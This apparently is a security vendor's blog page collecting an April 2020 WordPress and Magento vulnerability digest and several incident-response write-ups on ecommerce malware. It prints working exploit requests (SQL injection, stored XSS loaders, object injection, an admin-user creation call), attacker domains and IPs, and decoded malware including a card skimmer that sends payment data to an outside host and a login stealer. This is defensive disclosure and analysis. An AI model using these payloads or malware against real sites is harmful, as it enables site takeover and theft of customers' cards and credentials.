Category: Ecommerce Security

Vulnerabilities Digest: April 2020

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
Widget Settings Importer/Exporter Stored XSS Closed 40000
Accordion Stored/Reflected XSS 2.2.9 30000
Support Ticket System By Phoeniixx Reflected XSS Closed 2000
Gutenberg Blocks Authenticated Settings Change 1.14.8 200000
WP Lead Plus X Stored XSS 0.99 70000
OneTone Stored XSS Closed 20000
WP Advanced Search SQL Injection 3.3.6 1000
Easy Forms for Mailchimp Authenticated XSS 6.6.3 100000
CM Pop-Up banners Stored XSS 1.4.11 10000
Duplicate Page and Post SQL Injection 2.5.8 50000
WP post page close SQL Injection Closed ----

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL Injection in WP-Advanced-Search which was caused by an improper handling of user input data.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload]

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries. 

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload]

Vulnerable Code: 

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup builder plugin allows site owners to easily create promotion popups. This past month, versions < 3.64 were affected by an unauthenticated stored XSS and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D=

Many other plugins are still under attack. Please check our previous lab notes for more information.

Detected IPs
185.212.128.162
164.132.194.160
188.166.16.17
66.228.44.215
173.249.6.22
54.39.10.60
5.196.207.195
84.238.108.177
109.96.171.178
92.119.185.126

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites. 

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs
195.154.177.210
5.135.143.224
84.238.108.177
109.96.171.178
92.119.185.126
82.77.172.62
82.78.189.130

Old Magento Versions Still Exploited

Unpatched Magento sites will be always targeted by attackers and that’s why we encourage users to implement all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago and attackers are still taking advantage of them.

We've listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache - Object Injection

154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart - Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- 2020-04-14

Magento Core - SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

May 1, 2020 by John Castro

Web Skimmer With a Domain Name Generator –...

This note is a follow up to our recent post about a web skimmer that uses a dynamic domain name generating algorithm. This week, analyst Ben Martin found another variation of the same malware. The script looks very similar.

web skimmer domain name generator

The changes here are pretty minor: it uses a “ql” domain prefix instead of “qr” and the Math.sin() function instead of Math.cos(). This new variation also uses the name of the compromised site as the script path on the generated malicious domain.

[location.host,'js'].join('.')

Otherwise, the idea is identical — the generated domain names are based on the current month and year. As seen in the original post, the domains for March through December of 2020 are already registered.

March ql202141[.]pw
April ql201243[.]pw
May ql201041[.]pw
June ql201721[.]pw
July ql202657[.]pw
August ql202989[.]pw
September ql202412[.]pw
October ql201456[.]pw
November ql201000[.]pw
December ql201463[.]pw

All of these domains were registered on March 13th, 2020 within one minute by a user with the email valentinakrudyanova@yandex.ru. Domains from the original post were registered on March 18th, 2020, indicating that this “ql” variation is a predecessor for the “qr” campaign.

A URL scan indicates that this variant has been in use since mid-March: ql202141.]pw domain.

The obfuscated scripts served by the generated domains are web skimmers similar to what we described in the previous post. In this case, they send stolen data to hxxps://mykada[.]com/js/ar/ar7938.php, a domain previously mentioned in a February post by Marco Ramilli. Back then, the malware was also found to be using exfiltration URLs like hxxps://mykada[.]com/js/ar/ar2497.php.

If you believe your Magento website has been infected, you can refer to our hacked Magento guide for step-by-step instructions on how to remove malware and harden a compromised environment.

Apr 23, 2020 by Denis Sinegubko

When Online Shopping leads to Malware download

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to having a strange redirection when users visited the site. Without further ado, we started investigating the issue on this site.


The site loaded pretty slow on our end, which didn’t look right. There was something holding the site back. After further checking, we found a JavaScript include with suspicious URL on the page source as below:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that this is a conditional URL where on the first check, we could see a JavaScript code, but on the next check the code wouldn’t display anymore. Luckily we saved the JavaScript code firsthand and it redirected the user to download an executable file named ‘plugin.exe’ from a dropbox shared link as below: 

function process() { window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1"; } window.onerror = process; process()

We were able to download the ‘plugin.exe’ file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal gives 34/59 detection ratio for this file which shows pretty clearly that it is a malware file.

Since we confirmed on the malicious component, we went back to the site infrastructure to find its source. It wasn’t long before we figured out that the JavaScript include had been stored inside Magento database on core_config_data table as shown on screenshot below;

Right after the piece of code was removed from the database, the site started loading way faster than before. Luckily the site hasn’t been flagged nor blacklisted by Google, so we could skip the blacklist removal request procedure for now.

Searching a bit on Google for this similar threat, there are just a few infections related to this one for now, but all of them are related to Magento websites.

If you look into our previous labs notes related to Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, blackhat SEO, or even malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Aug 28, 2017 by Ahmad Azizan

Mobile Malware Targets eCommerce Websites & Users

A mobile malware is a malicious software that targets mobile/smartphones, tablets and similar devices. The attacks may vary from fatal damage to the OS (bricking) to leakage of sensitive and personal information, such as credit card, saved passwords, pictures and much more.


With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an Incident Response investigation, we identified a malicious code in a Magento installation located at the “./js/mage/cookies.js” file. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type="text/javascript" src="hxxp://Malicious-URL-REMOVED.com/odessa/?md2"></script>", "write"];function isMobile() {    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);    if (/android.+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {        return true    };    return false}if (isMobile() === true) {    document[_$_f51c[6]](_$_f51c[5])}

The function isMobile() checks if the visitor is using any of the predefined list of smartphones/tablets and if it matches, the user will be redirected to other malicious websites.

These other websites will prompt to install third-party software that claims to clean or speed up mobile devices, toolbars, adware or even worse, malicious URLs distributing ransomware that will lock the device and hold it hostage until you an X amount of money is paid to the attacker via bitcoin.

Depending on the attacker’s campaign, they may also redirect visitors or potential buyers to competitor websites, therefore causing a huge impact on the site owner’s revenue. Keep in mind that these attacks are not limited to Magento websites only as it may target WordPress, Joomla, OpenCart, Prestashop, and different other platforms.

To detect and prevent these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files/database. If your environment happens to be compromised, you’d be able to identify and promptly restore the files preventing any further damages to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

Aug 11, 2017 by Moe Obaid

A Simple Prestashop Login Swiper

In a compromised environment, attackers may inject malicious code into different files, including the core of different CMSs, in order to maintain access to the website and/or obtain sensitive data. Although these issues are very simple to be identified and remediated, not all users constantly monitor their websites for such file integrity breaches.


One of these injections is known as credential stealer, which consists of intercepting the authentication mechanism and saving the username/password either into a file or sending it via email to the attacker.

During an Incident Response process, we found a malware of this category injected in the Prestashop file “./controllers/AuthController.php”. Here is the snippet:

if (Tools::isSubmit('SubmitLogin'))     {        Module::hookExec('beforeAuthentication');        $passwd = trim(Tools::getValue('passwd'));        $email = trim(Tools::getValue('email'));        if (empty($email))           $this->errors[] = Tools::displayError('E-mail address required');...        elseif (Tools::strlen($passwd) > 32)           $this->errors[] = Tools::displayError('Password is too long');        elseif (!Validate::isPasswd($passwd))           $this->errors[] = Tools::displayError('Invalid password');        else        {strong>eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb')));           $customer = new Customer();           $authentication = $customer->getByEmail(trim($email), trim($passwd));           if (!$authentication OR !$customer->id)

]

The obfuscation code is a very common technique used by attackers to hide the malicious code, but most scanners will trigger an alert for files containing a combination of eval() and base64_decode() string.

When decoding it, we could see the following snippet:

if(function_exists("fopen")){$fp=fopen("AjaxController.php","a");fwrite($fp, $email." || ".$passwd." || ".$_SERVER["HTTP_X_FORWARDED_FOR"]." || ".$_SERVER["REMOTE_ADDR"]." || ".$_SERVER["HTTP_USER_AGENT"]."<br><hr>");fclose($fp);}

The code above will run whenever a user tries to authenticate on Prestashop’s backend, dumping sensitive data, such as email, password, IP address and user agent into the file AjaxController.php.

From there, all the attacker has to do is download this file to get a list of credentials and take control over the site to create bogus users, change payment info, and/or perform all different kinds of malicious activities.

On a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article though tends to be simpler and more reliable because there's no need for an email account in order to be successful.

To prevent such attacks, keep your Prestashop site and modules always up to date and remember to monitor your core files. If you suspect that your site has been compromised and needs specialized assistance, our security analyst at https://sucuri.net will be glad to help.

Jul 7, 2017 by Conrado Torquato

One, two, three… CC stolen!

Attackers work hard to make their code very well hidden from the victim and antivirus products, however they might leave some fingerprints (usually not on purpose) that can make the infection easier to detect and remediate.


One case in particular was from an ecommerce website that had “123” displayed at the top of it. After some investigation, we were able to find the following line in the ./.htaccess file:

php_value auto_prepend_file "/var/www/vhosts/site.com/public_html/.htaccess BKP 010515"

In a .htaccess with hundreds of lines (like the one from this case), that line might go unnoticed. The auto_prepend directive will load “a file that is automatically parsed before the main file. The file is included as if it was called with the require function, so include_path is used.” (source).

When checking the ./.htaccess BKP 010515 file, we found the following:

<script language="php">@error_reporting(0);$a_x="x63x72x65x61x74x65x5fx66x75x6ex63x74x69x6fx6e";$b_x='ba'.'se'.'6'.'4'.'_d'.'e'."co".'de';$n_x=$a_x('',$b_x('aWYoIWVtcHR5KCRfUE9TVFsnYmlsbGluZ19maXJzdF9uYW1lJ10pIGFu...aG8gMTIzOw=='));@$n_x();</script>

Which, once decoded, turns into:

if(!empty($_POST['billing_first_name']) and !empty($_POST['billing_last_name'])) {$_xPOST['billing_first_name'] = trim($_POST['billing_first_name']);$_xPOST['billing_last_name'] = trim($_POST['billing_last_name']);}if(!empty($_POST['ccnum']) and !empty($_xPOST['billing_first_name']) and !empty($_xPOST['billing_last_name'])){$ch = false;$z = 'base6'.'4_d'.'eco'.'de';$header[]="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";$header[]="Accept-Language: en-US,en;q=0.5";$header[]="Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7";@$ch=curl_init($z('aHR0cDovL3lhaG9vcy5jYy9jaGVjay9hamF4LnBocD9jPQ==').urlencode($_POST['ccnum']).'&c2='.$_POST['cvv'].'&amp;name='.urlencode($_xPOST['billing_first_name']." ".$_xPOST['billing_last_name']).'&month='.urlencode($_POST['expmonth']).'&year='.urlencode($_POST['expyear']).'&address='.urlencode($_POST['billing_address_1']." ".$_POST['billing_address_2']).'&city='.urlencode($_POST['billing_city']).'&country='.urlencode($_POST['billing_country']).'&state='.urlencode($_POST['billing_state']).'&zip='.$_POST['billing_postcode'].'&phone='.urlencode($_POST['billng_phone']).'&cd='.urlencode($_SERVER['HTTP_HOST']));if($ch){curl_setopt($ch,CURLOPT_ENCODING,'utf-8');curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36');curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);@curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,11);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,7);curl_setopt($ch,CURLOPT_HTTPHEADER,$header);@curl_exec($ch); @curl_close($ch);}}echo 123;

When a client from the victim’s website fills out information on the checkout page, like credit card details, that code sends it (through curl) to hXXp://yahoos[.]cc/check/ajax[.]php, passing the details through GET requests.

You may also notice that code is responsible for the “123” on the victim’s website. Once .htaccess BKP 010515 cleared up, the “123” disappeared.

If you’re experiencing similar problems and would like them fixed by security experts, let us know.

Mar 7, 2017 by Fernando Barbosa